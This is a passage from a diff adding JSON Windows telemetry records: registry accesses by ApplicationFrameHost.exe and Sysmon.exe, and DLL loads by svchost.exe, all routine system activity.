Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + 
"process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + 
"unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": 
"{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4052, + "process_name": "svchost.exe", + 
"process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManager.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManager.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
